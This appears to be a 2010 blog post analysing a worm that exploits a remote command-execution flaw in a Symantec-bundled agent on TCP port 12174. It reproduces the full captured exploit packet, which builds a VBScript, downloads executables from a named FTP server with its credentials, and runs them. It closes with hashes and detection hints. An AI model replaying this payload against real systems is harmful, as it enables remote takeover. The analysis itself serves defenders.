Friday, January 15, 2010

Trace Symantec Malware Step By Step

Trace Symantec Malware Step By Step

by majidi.nima AT gmail.com

Saturday, January 11, 2010


First Section: Exploit Payload Analyze

Vulnerability description:
“The specific flaw exists in the Intel LANDesk Common Base Agent bundled with the affected products. When a specially crafted packet is sent to TCP port 12174, the contents of the packet are passed directly to a call to CreateProcessA() as the lpCommandLine argument. The resulting command will be executed with SYSTEM privileges. Authentication is not required to exploit this vulnerability.” ZDI-09-060 , Apr 28 2009

Since it is not a memory corruption vulnerability, exploitation of this issue is straight-forward and stable. Symantec End point protection, Symantec Antivirus corporate edition and Symantec security client are affected by this vulnerability. Active exploitation of the vulnerability has been started since MID October and had a sudden pick at the end of December.





Closer look in Worm exploit:

I Review two public exploits for this vulnerability: one module for Metasploit Framework (cba_exec.rb) and another by someone published as “kingscope”. The worm exploits basically the same as kingscope POC. But it’s has got some differences that you can see them in following table:

(Symantec worm Exploit architecture)

\x00\x00\x00\x00\xFB\x01 -----> start process cmd.exe /c -----> exit -1059867469 >> \x00\x00

(Symantec Public Exploits architecture)

\x00\x00\x00\x00\x38\x00 -----> start process cmd.exe /c -----> exit -1059867469 >> \x00

Exploit Database ID “EDB-ID: 10340”

Exploit Payload Analyze:
The exploit code uses cmd.exe to create VBSCRIPT file (d.vbs) which downloads malicious files from remote ftp server. The following table shows the VBSCRIPT creation phase .the exploit packets captured on TCP port 12174, and have 514 bytes of data.


00 00 00 00 FB 01 63 6D 64 2E 65 78 65 20 2F 63 ....รป.cmd.exe /c
20 63 6D 64 2E 65 78 65 20 2F 63 20 65 63 68 6F cmd.exe /c echo
20 6F 6E 20 65 72 72 6F 72 20 72 65 73 75 6D 65 on error resume
20 6E 65 78 74 20 3E 64 2E 76 62 73 26 65 63 68 next >d.vbs&ech
6F 20 63 6D 64 6C 69 6E 65 3D 57 73 63 72 69 70 o cmdline=Wscrip
74 2E 41 72 67 75 6D 65 6E 74 73 28 30 29 20 3E t.Arguments(0) >
3E 64 2E 76 62 73 26 65 63 68 6F 20 53 65 74 20 >d.vbs&echo Set
57 53 3D 63 72 65 61 74 65 6F 62 6A 65 63 74 28 WS=createobject(
43 68 72 28 31 31 39 29 2B 43 68 72 28 31 31 35 Chr(119)+Chr(115
29 2B 43 68 72 28 39 39 29 2B 43 68 72 28 31 31 )+Chr(99)+Chr(11
34 29 2B 43 68 72 28 31 30 35 29 2B 43 68 72 28 4)+Chr(105)+Chr(
31 31 32 29 2B 43 68 72 28 31 31 36 29 2B 43 68 112)+Chr(116)+Ch
72 28 34 36 29 2B 43 68 72 28 31 31 35 29 2B 43 r(46)+Chr(115)+C
68 72 28 31 30 34 29 2B 43 68 72 28 31 30 31 29 hr(104)+Chr(101)
2B 43 68 72 28 31 30 38 29 2B 43 68 72 28 31 30 +Chr(108)+Chr(10
38 29 29 20 3E 3E 64 2E 76 62 73 26 65 63 68 6F 8)) >>d.vbs&echo
20 77 73 2E 72 75 6E 20 63 6D 64 6C 69 6E 65 2C ws.run cmdline,
30 20 3E 3E 64 2E 76 62 73 26 64 2E 76 62 73 20 0 >>d.vbs&d.vbs
22 63 6D 64 2E 65 78 65 20 2F 63 20 6D 64 20 69 "cmd.exe /c md i
53 71 6C 26 63 64 20 69 53 71 6C 26 64 65 6C 20 Sql&cd iSql&del
2A 2E 2A 20 2F 66 20 2F 71 26 65 63 68 6F 20 6F *.* /f /q&echo o
70 65 6E 20 69 6E 74 6F 2E 69 6D 7A 6F 6E 65 2E pen into.imzone.
69 6E 3E 6A 26 65 63 68 6F 20 4E 65 77 20 3E 3E in>j&echo New >>
6A 26 65 63 68 6F 20 31 32 33 20 3E 3E 6A 26 65 j&echo 123 >>j&e
63 68 6F 20 6D 67 65 74 20 2A 2E 65 78 65 20 3E cho mget *.exe >
3E 6A 26 65 63 68 6F 20 62 79 65 20 3E 3E 6A 26 >j&echo bye >>j&
66 74 70 20 2D 69 20 2D 73 3A 6A 26 64 65 6C 20 ftp -i -s:j&del
6A 26 65 63 68 6F 20 66 6F 72 20 25 25 69 20 69 j&echo for %%i i
6E 20 28 2A 2E 65 78 65 29 20 64 6F 20 73 74 61 n (*.exe) do sta
72 74 20 25 25 69 3E 44 2E 62 61 74 26 44 2E 62 rt %%i>D.bat&D.b
61 74 26 64 65 6C 20 44 2E 62 61 74 22 20 7C 20 at&del D.bat"
65 78 69 74 20 2D 31 30 35 39 38 36 37 34 36 39 exit -1059867469
00 00 ..
The visual basic script (vbs) for provides more stability for the worm to run multiple commands on vulnerable system. The exploit creates new folder named (iSql) and if the folder exists, remove files from it.


Finally, an ftp script file named “j” will be creating and using for download binaries from remote ftp server by Microsoft ftp utility, this is common method using by malwares or attackers to download something from remote host on victim machine.

J ftp script details:

Remote ftp server: into.imzone.in (IP, 204.45.0.218)
FTP User: new
FTP password: 123
Files: A02.EXE
File size 253952 bytes
MD5 hash c13fa993b714491b1ec15a18a6118d8d
SHA1 hash 189566fa2250471014a37d96eaf4931767920eb2
(This is our first seen binary but after a week over 10 files added to root of ftp server, and serving for zombies.)

drw-rw-rw- 1 user group 0 Jan 11 08:00 .
drw-rw-rw- 1 user group 0 Jan 11 08:00 ..
-rw-rw-rw- 1 user group 253952 Jan 10 03:27 A09.exe
-rw-rw-rw- 1 user group 65536 Jan 7 10:39 E001.exe
-rw-rw-rw- 1 user group 12288 Jan 6 13:32 G001.exe
-rw-rw-rw- 1 user group 36968 Jan 11 2010 H001.exe
-rw-rw-rw- 1 user group 188416 Dec 29 06:17 J001.exe
-rw-rw-rw- 1 user group 134576 Jan 10 22:01 J002.exe
-rw-rw-rw- 1 user group 65536 Jan 6 10:53 M001.exe
-rw-rw-rw- 1 user group 16138 Jan 9 04:16 P001.exe
-rw-rw-rw- 1 user group 69632 Jan 11 2010 Q.exe
-rw-rw-rw- 1 user group 65536 Jan 6 12:30 d001.exe


After successful transfer of all files with exe extension (*.exe), the ftp script file will be removed.At this point a new bat file (D.bat) is created to run all the downloaded malicious files on the victim system .The bat file will also be removed at the end.

System Administrators can investigate suspicious systems for infection by searching for iSql or d.vbs file. IDS signatures can be developed based on the infection vector that is summarized in the following table.

This is test

This is test ! hello world !